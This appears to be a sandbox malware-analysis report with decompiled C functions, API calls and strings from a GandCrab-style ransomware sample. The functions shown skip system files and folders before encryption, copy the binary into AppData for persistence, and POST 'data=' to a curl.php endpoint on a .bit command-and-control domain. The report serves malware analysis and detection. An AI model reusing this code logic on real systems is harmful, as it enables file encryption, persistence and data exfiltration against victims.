Instruction ID: 44b8093c524016bbada522a31e88d512a8f510cbcd66d5edadffd564a9cd439a
Opcode Fuzzy Hash: 00609ae607010b940ed90ab1d5db3889638b4994c3af1a85ebe3b2a3ba4c502e
Instruction Fuzzy Hash: 4B51AE76A00218ABCB109FA5E859B9E7FB4FF49B65F2040D9F500AB281DB705905CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6790 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC6790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0fbc6799
0x0fbc679c
0x0fbc67a1
0x0fbc67a3
0x0fbc67a6
0x0fbc67a9
0x0fbc67aa
0x0fbc67b0
0x0fbc67b0
0x0fbc67b3
0x0fbc67b4
0x0fbc67b0
0x0fbc67c4
0x0fbc67d1
0x0fbc67e6
0x00000000
0x0fbc6830
0x0fbc6836
0x0fbc683b
0x0fbc6840
0x0fbc6840
0x0fbc67d5
0x0fbc67d5
0x0fbc67db
0x0fbc67db

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FBC69A3), ref: 0FBC679C
lstrlenW.KERNEL32(00000000), ref: 0FBC67A1
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FBC67CD
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FBC67E2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FBC67EE
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FBC67FA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FBC6806
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FBC6812
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FBC681E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FBC682A
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0FBC6836

Strings

ntuser.dat.log, xrefs: 0FBC6818
desktop.ini, xrefs: 0FBC67C7
boot.ini, xrefs: 0FBC680C
iconcache.db, xrefs: 0FBC67F4
ntuser.dat, xrefs: 0FBC67E8
i)w, xrefs: 0FBC67BE
autorun.inf, xrefs: 0FBC67DC
bootsect.bak, xrefs: 0FBC6800
thumbs.db, xrefs: 0FBC6824
GDCB-DECRYPT.txt, xrefs: 0FBC6830

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: i)w$GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3812678309
Opcode ID: 707343b5db58153e00d176e2048f8d13093200625f86f93b67b8d0ff2c3264e1
Instruction ID: d2f33a852ac3b8f99441a448c6671fb81326478ddf8264de971d72b5af022ef0
Opcode Fuzzy Hash: 707343b5db58153e00d176e2048f8d13093200625f86f93b67b8d0ff2c3264e1
Instruction Fuzzy Hash: B511A76270173B255A10276BBC51DFB135FCDC29A074509DEEE04E2853DB45EA134CF6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC54A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0FBC54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FBC7CE0( &_v36);
				_v24 = E0FBC5060();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x77296981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xfbcfb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xfbcfb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xfbcfb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xfbcfb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xfbcfb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xfbcfb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0FBC9010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0FBC53A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0FBC7EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0FBC5210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x77296981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x0fbc54ab
0x0fbc54ad
0x0fbc54b4
0x0fbc54b7
0x0fbc54c2
0x0fbc54d8
0x0fbc54df
0x0fbc54f3
0x0fbc54f7
0x0fbc54fc
0x0fbc5501
0x0fbc550a
0x0fbc550a
0x0fbc550c
0x0fbc5518
0x0fbc551e
0x0fbc5520
0x0fbc5529
0x0fbc5531
0x0fbc5539
0x0fbc553e
0x0fbc5546
0x0fbc554b
0x0fbc5553
0x0fbc5558
0x0fbc5560
0x0fbc5565
0x0fbc556d
0x0fbc5572
0x0fbc5578
0x0fbc5587
0x0fbc558d
0x0fbc55a1
0x0fbc55ad
0x0fbc55b9
0x0fbc55bf
0x0fbc55c2
0x0fbc55c9
0x0fbc55ca
0x0fbc55d2
0x0fbc55d7
0x0fbc55df
0x0fbc55e0
0x0fbc55e1
0x0fbc55ea
0x0fbc55eb
0x0fbc55f6
0x0fbc55fc
0x0fbc5601
0x0fbc5606
0x0fbc5616
0x0fbc5626
0x0fbc5618
0x0fbc5618
0x0fbc561d
0x0fbc5622
0x0fbc5622
0x0fbc561d
0x0fbc5616
0x0fbc5601
0x0fbc5636
0x0fbc5642
0x0fbc564e
0x0fbc5650
0x0fbc5655
0x0fbc5658
0x0fbc5658
0x0fbc5666
0x0fbc5666
0x0fbc5503
0x0fbc5508
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0FBC7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
Part of subcall function 0FBC7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

Part of subcall function 0FBC5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0FBC50C6
Part of subcall function 0FBC5060: Sleep.KERNEL32(000003E8), ref: 0FBC5103
Part of subcall function 0FBC5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBC5111
Part of subcall function 0FBC5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBC5121
Part of subcall function 0FBC5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBC513D
Part of subcall function 0FBC5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC514E
Part of subcall function 0FBC5060: wsprintfW.USER32 ref: 0FBC5166
Part of subcall function 0FBC5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC5177

lstrlenA.KERNEL32(00000000,77296980,00000000,00000000), ref: 0FBC54C5
VirtualAlloc.KERNEL32(00000000,77296981,00003000,00000040), ref: 0FBC54E5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBC54FA
lstrcatA.KERNEL32(00000000,data=), ref: 0FBC5518
lstrcatA.KERNEL32(00000000,0FBC582E), ref: 0FBC551E
lstrlenA.KERNEL32(00000000), ref: 0FBC5572
_memset.LIBCMT ref: 0FBC558D
lstrcpyW.KERNEL32 ref: 0FBC55A1
lstrlenW.KERNEL32(?), ref: 0FBC55B9
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0FBC55D9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0FBC5636
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FBC5642
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FBC564E
InternetCloseHandle.WININET(?), ref: 0FBC5658

Strings

POST, xrefs: 0FBC55CA
curl.php?token=, xrefs: 0FBC559B
data=, xrefs: 0FBC5512

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: af117265344edf2c7623ab47bd835b4f7e53400b7e94938bf019bd2e7463ca82
Instruction ID: 3eaa4a8867e9d6dd1154f39eb3eaf9f2bc143ef155f27d567a1af8168977f553
Opcode Fuzzy Hash: af117265344edf2c7623ab47bd835b4f7e53400b7e94938bf019bd2e7463ca82
Instruction Fuzzy Hash: 4651B1B5E0030AAADB109BA5EC51BEFBB7DFB88701F104599EA44B3141DB786645CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FBC8090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FBC8150( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FBC8090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FBC2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FBC2960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}

0x0fbc2ad6
0x0fbc2aea
0x0fbc2af0
0x0fbc2af4
0x0fbc2af6
0x0fbc2b00
0x0fbc2b1c
0x0fbc2b1e
0x0fbc2b1e
0x0fbc2b02
0x0fbc2b02
0x0fbc2b02
0x0fbc2b08
0x0fbc2b10
0x0fbc2b12
0x0fbc2b14
0x0fbc2b14
0x0fbc2b28
0x0fbc2b2c
0x0fbc2b38
0x0fbc2b3e
0x0fbc2b43
0x0fbc2b48
0x0fbc2b4a
0x0fbc2b55
0x0fbc2b62
0x0fbc2b67
0x0fbc2b6c
0x0fbc2b75
0x0fbc2b89
0x0fbc2b8e
0x0fbc2b9c
0x0fbc2ba2
0x0fbc2ba5
0x0fbc2ba7
0x0fbc2bac
0x0fbc2bae
0x0fbc2be4
0x0fbc2bec
0x0fbc2bf4
0x0fbc2bf6
0x0fbc2bfd
0x0fbc2c02
0x0fbc2c05
0x0fbc2c07
0x00000000
0x00000000
0x0fbc2c0f
0x0fbc2c11
0x0fbc2c16
0x0fbc2c1d
0x0fbc2c2c
0x0fbc2c2c
0x0fbc2c2c
0x0fbc2c2e
0x0fbc2c2e
0x0fbc2c2f
0x0fbc2c35
0x0fbc2c3b
0x00000000
0x0fbc2c3d
0x0fbc2c25
0x0fbc2c2a
0x00000000
0x00000000
0x00000000
0x0fbc2c2a
0x0fbc2bb6
0x0fbc2bb8
0x0fbc2bbd
0x0fbc2bc4
0x0fbc2bd3
0x0fbc2bd3
0x0fbc2bd3
0x0fbc2bd5
0x0fbc2bd5
0x00000000
0x0fbc2bd5
0x0fbc2bcc
0x0fbc2bd1
0x00000000
0x00000000
0x00000000
0x0fbc2b4c
0x0fbc2b4c
0x0fbc2c40
0x0fbc2c40
0x0fbc2c45
0x0fbc2c47
0x0fbc2c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBC2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBC2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FBC2B7D

Part of subcall function 0FBC8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
Part of subcall function 0FBC8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
Part of subcall function 0FBC8150: GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
Part of subcall function 0FBC8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
Part of subcall function 0FBC8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
Part of subcall function 0FBC8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
Part of subcall function 0FBC8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FBC2B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FBC2BE4
lstrcatW.KERNEL32(00000000,?), ref: 0FBC2BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0FBC2BF4
wsprintfW.USER32 ref: 0FBC2C35
ExitThread.KERNEL32 ref: 0FBC2C47

Strings

"%s", xrefs: 0FBC2C2F
P, xrefs: 0FBC2B55
I, xrefs: 0FBC2B6C
\Microsoft\, xrefs: 0FBC2BDE
AppData, xrefs: 0FBC2B97
U, xrefs: 0FBC2B75
.exe, xrefs: 0FBC2BEE

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 5e8559f16c48aa895b884ce6e7ba956b73fa11e5d53b2fbe9050bec991322460
Instruction ID: 05023c658991bef7bf4e18fff1fe13eab8e220fd6c44e794724b8da21613c45d
Opcode Fuzzy Hash: 5e8559f16c48aa895b884ce6e7ba956b73fa11e5d53b2fbe9050bec991322460
Instruction Fuzzy Hash: CC41D5742043049FE300EF21FC59BAB7B99EF88715F0404ACB65597282DAB8D909CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FBC6640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FBC8090(_t46, L"\\ProgramData\\") != 0 || E0FBC8090(_t46, L"\\Program Files\\") != 0 || E0FBC8090(_t46, L"\\Tor Browser\\") != 0 || E0FBC8090(_t46, L"Ransomware") != 0 || E0FBC8090(_t46, L"\\All Users\\") != 0 || E0FBC8090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0FBC8090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}

0x0fbc6651
0x0fbc6660
0x0fbc6669
0x0fbc676c
0x0fbc6775
0x0fbc6780
0x0fbc66d3
0x0fbc66da
0x0fbc66e1
0x00000000
0x0fbc66e7
0x0fbc66e7
0x0fbc66ed
0x0fbc66ee
0x0fbc66f0
0x0fbc66f1
0x0fbc66f6
0x0fbc6705
0x0fbc6707
0x0fbc6709
0x0fbc670a
0x0fbc6710
0x0fbc671f
0x0fbc6721
0x0fbc6723
0x0fbc6724
0x0fbc672a
0x0fbc6739
0x0fbc673b
0x0fbc673d
0x0fbc673e
0x0fbc6744
0x0fbc6760
0x0fbc676b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc66f6
0x0fbc66e1

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6653
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC66F2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC670C
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6726
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6740
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6760
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6775

Strings

\All Users\, xrefs: 0FBC66AB
:\Windows\, xrefs: 0FBC66D3
\Local Settings\, xrefs: 0FBC66BF
\Program Files\, xrefs: 0FBC666F
\Tor Browser\, xrefs: 0FBC6683
Ransomware, xrefs: 0FBC6697
\ProgramData\, xrefs: 0FBC6659

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-2358141795
Opcode ID: 1c81fec78ecc2277b9952246f563022f8762c501c7aee4cd462bb580b97599d9
Instruction ID: d7a0d6c398f62085b3285aa264dcf1ebf0d3e6fb61d3115576314694433b4892
Opcode Fuzzy Hash: 1c81fec78ecc2277b9952246f563022f8762c501c7aee4cd462bb580b97599d9
Instruction Fuzzy Hash: D8312D2134071123F96021773E65F2B668BCBD1E51F5144DEAF15DE2C3EE9AD8024AE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FBC5060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfbd04c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xfbd04d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FBC4E90(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0fbc5066
0x0fbc5076
0x0fbc5081
0x0fbc5086
0x0fbc508c
0x0fbc509b
0x0fbc50a1
0x0fbc50a6
0x0fbc50aa
0x0fbc50b1
0x0fbc50b8
0x0fbc50bf
0x0fbc50c3
0x0fbc50c6
0x0fbc50cc
0x0fbc50ce
0x0fbc50d3
0x0fbc50d9
0x0fbc50db
0x0fbc50e0
0x0fbc50e2
0x0fbc50e2
0x0fbc50e6
0x0fbc50e7
0x0fbc50ed
0x0fbc50f2
0x0fbc50f4
0x0fbc50f7
0x0fbc50f7
0x0fbc50fc
0x0fbc5103
0x0fbc5103
0x0fbc512a
0x0fbc512d
0x0fbc512f
0x0fbc5134
0x0fbc513d
0x0fbc5145
0x00000000
0x00000000
0x0fbc514e
0x0fbc5154
0x0fbc5157
0x0fbc5157
0x0fbc515c
0x0fbc5166
0x0fbc5177
0x0fbc517d
0x0fbc517d
0x0fbc5185

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0FBC50C6
Sleep.KERNEL32(000003E8), ref: 0FBC5103
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBC5111
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBC5121
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBC513D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC514E
wsprintfW.USER32 ref: 0FBC5166
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC5177

Strings

.bit, xrefs: 0FBC50B8
n, xrefs: 0FBC509B
fabian wosar <3, xrefs: 0FBC5137
crab, xrefs: 0FBC50B1
gand, xrefs: 0FBC50AA

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
